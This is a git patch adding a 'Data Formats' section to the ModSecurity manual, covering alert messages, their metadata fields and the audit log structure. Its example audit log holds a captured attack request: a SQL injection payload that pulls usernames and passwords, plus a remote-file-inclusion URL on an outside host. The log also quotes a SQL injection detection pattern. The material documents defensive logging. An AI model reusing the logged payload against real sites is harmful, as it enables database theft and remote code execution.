From d8fa66515a82e1ce535b006bab8091044c39d2b5 Mon Sep 17 00:00:00 2001 From: ivanr Date: Thu, 10 Jan 2008 12:47:59 +0000 Subject: [PATCH] Document data formats. --- doc/modsecurity2-apache-reference.xml | 256 +++++++++++++++++++++++++- 1 file changed, 253 insertions(+), 3 deletions(-) diff --git a/doc/modsecurity2-apache-reference.xml b/doc/modsecurity2-apache-reference.xml index bee3a803..03f86080 100644 --- a/doc/modsecurity2-apache-reference.xml +++ b/doc/modsecurity2-apache-reference.xml @@ -3,10 +3,10 @@ ModSecurity Reference Manual - Version 2.5.0-rc1/ (December 21, 2007) + Version 2.5.0-rc1/ (January 10, 2008) - 2004-2007 + 2004-2008 Breach Security, Inc. (http://www.breach.com) @@ -3849,7 +3849,8 @@ SecRule REQUEST_CONTENT_TYPE ^text/xml nolog,pass,ctl:requestBodyProce - ruleRemoveById + ruleRemoveById (single rule ID, or a + single rule ID range accepted as parameter) @@ -5262,6 +5263,255 @@ SecRule REQUEST_METHOD "!@within %{tx.allowed_methods}" t:l +
+ Data Formats + + This section documents the various data formats used by + ModSecurity. + +
+ Alerts + + Below is an example of a ModSecurity alert entry. It is always + contained on a single line but we've broken it here into multiple lines + for readability. + + Access denied with code 505 (phase 1). Match of "rx ^HTTP/(0\\\\.9|1\\\\.[01])$" +against "REQUEST_PROTOCOL" required. [id "960034"] [msg "HTTP protocol version +is not allowed by policy"] [severity "CRITICAL"] [uri "/"] [unique_id +"PQaTTVBEUOkAAFwKXrYAAAAM"] + + Each alert entry begins with the engine message: + + Access denied with code 505 (phase 1). Match of "rx ^HTTP/(0\\\\.9|1\\\\.[01])$" +against "REQUEST_PROTOCOL" required. + + The engine message consist of two parts. The first part tells you + whether ModSecurity acted to interrupt transaction or rule processing. + If it did nothing the first part of the message will simply say + "Warning". If an action was taken then one of the following messages + will be used: + + + + Access denied with code %0 - a response + with status code %0 was sent. + + + + Access denied with connection close - + connection was abruptly closed. + + + + Access denied with redirection to %0 using status + %1 - a redirection to URI %0 was issued using status + %1. + + + + Access allowed - rule engine stopped + processing rules (transaction was unaffected). + + + + Access to phase allowed - rule engine + stopped processing rules in the current phase only. Subsequent + phases will be processed normally. Transaction was not affected by + this rule but it may be affected by any of the rules in the + subsequent phase. + + + + Access to request allowed - rule engine + stopped processing rules in the current phase. Phases prior to + request execution in the backend (currently phases 1 and 2) will not + be processed. The response phases (currently phases 3 and 4) and + others (currently phase 5) will be processed as normal. Transaction + was not affected by this rule but it may be affected by any of the + rules in the subsequent phase. + + + + The second part of the engine message explains + why was the event generated. Since it is + automatically generated from the rules it will be very technical in + nature talking about operators and their parameters and give you insight + into what the rule looked like. But this message cannot give you insight + into the reasoning behind the rule. A well-written rule will always + specify a human-readable message (using the msg + action) to provide further clarification. + + The metadata fields are always placed at the end of the alert + entry. Each metadata field is a text fragment that consists of an open + bracket followed by the metadata field name, followed by the value and + the closing bracket. What follows is the text fragment that makes up the + id metadata field. + + [id "960034"] + + The following metadata fields are currently used: + + + + id - Unique rule ID, as specified by the + id action. + + + + rev - Rule revision, as specified by the + rev action. + + + + msg - Human-readable message, as specified + by the msg action. + + + + severity - Event severity, as specified by + the severity action. + + + + unique_id - Unique event ID, generated + automatically. + + + + uri - Request URI. + + + + logdata - contains transaction data + fragment, as specified by the logdata + action. + + + +
+ Alerts in Apache + + Every ModSecurity alert conforms to the following format when it + appears in the Apache error log: + + [Sun Jun 24 10:19:58 2007] [error] [client 192.168.0.1] ModSecurity: ALERT_MESSAGE + + The above is a standard Apache error log format. The + "ModSecurity:" prefix is specific to ModSecurity. It is used to allow + quick identification of ModSecurity alert messages when they appear in + the same file next to other Apache messages. + + The actual message (ALERT_MESSAGE in the + example above) is in the same format as described in the + Alerts section. +
+ +
+ Alerts in Audit Log + + Alerts are transported in the H section of + the ModSecurity Audit Log. Alerts will appear each on a separate line + and in the order they were generated by ModSecurity. Each line will be + in the following format: + + Message: ALERT_MESSAGE + + Below is an example of an entire H section + (followed by the Z section terminator): + + --c7036611-H-- +Message: Warning. Match of "rx ^apache.*perl" against "REQUEST_HEADERS:User-Agent" required. [id "990011"] + [msg "Request Indicates an automated program explored the site"] [severity "NOTICE"] +Message: Warning. Pattern match "(?:\\b(?:(?:s(?:elect\\b(?:.{1,100}?\\b(?:(?:length|count|top)\\b.{1,100} + ?\\bfrom|from\\b.{1,100}?\\bwhere)|.*?\\b(?:d(?:ump\\b.*\\bfrom|ata_type)|(?:to_(?:numbe|cha)|inst)r))|p_ + (?:(?:addextendedpro|sqlexe)c|(?:oacreat|prepar)e|execute(?:sql)?|makewebt ..." at ARGS:c. [id "950001"] + [msg "SQL Injection Attack. Matched signature: union select"] [severity "CRITICAL"] +Stopwatch: 1199881676978327 2514 (396 2224 -) +Producer: ModSecurity v2.x.x (Apache 2.x) +Server: Apache/2.x.x + +--c7036611-Z-- +
+
+ +
+ Audit Log + + ModSecurity records one transaction in a single audit log file. + Below is an example: + + --c7036611-A-- +[09/Jan/2008:12:27:56 +0000] OSD4l1BEUOkAAHZ8Y3QAAAAH 209.90.77.54 64995 80.68.80.233 80 +--c7036611-B-- +GET //EvilBoard_0.1a/index.php?c='/**/union/**/select/**/1,concat(username,char(77), + password,char(77),email_address,char(77),info,char(77),user_level,char(77))/**/from + /**/eb_members/**/where/**/userid=1/*http://kamloopstutor.com/images/banners/on.txt? + HTTP/1.1 +TE: deflate,gzip;q=0.3 +Connection: TE, close +Host: www.thinkingstone.com +User-Agent: libwww-perl/5.808 + +--c7036611-F-- +HTTP/1.1 404 Not Found +Content-Length: 223 +Connection: close +Content-Type: text/html; charset=iso-8859-1 + +--c7036611-H-- +Message: Warning. Match of "rx ^apache.*perl" against "REQUEST_HEADERS:User-Agent" required. [id "990011"] + [msg "Request Indicates an automated program explored the site"] [severity "NOTICE"] +Message: Warning. Pattern match "(?:\\b(?:(?:s(?:elect\\b(?:.{1,100}?\\b(?:(?:length|count|top)\\b.{1,100} + ?\\bfrom|from\\b.{1,100}?\\bwhere)|.*?\\b(?:d(?:ump\\b.*\\bfrom|ata_type)|(?:to_(?:numbe|cha)|inst)r))|p_ + (?:(?:addextendedpro|sqlexe)c|(?:oacreat|prepar)e|execute(?:sql)?|makewebt ..." at ARGS:c. [id "950001"] + [msg "SQL Injection Attack. Matched signature <union select>"] [severity "CRITICAL"] +Apache-Error: [file "/tmp/buildd/apache2-2.0.54/build-tree/apache2/server/core.c"] [line 3505] [level 3] + File does not exist: /var/www/EvilBoard_0.1a +Stopwatch: 1199881676978327 2514 (396 2224 -) +Producer: ModSecurity v2.x.x (Apache 2.x) +Server: Apache/2.x.x + +--c7036611-Z-- + + + The file consist of multiple sections, each in different format. + Separators are used to define sections: + + --c7036611-A-- + + A separator always begins on a new line and conforms to the + following format: + + + + Two dashes + + + + Unique boundary, which consists from several hexadecimal + characters. + + + + One dash character. + + + + Section identifier, currently a single uppercase letter. + + + + + Two trailing dashes. + + + + Refer to the documenation for SecAuditLogParts + for the explanation of each part. +
+
+
Miscellaneous Topics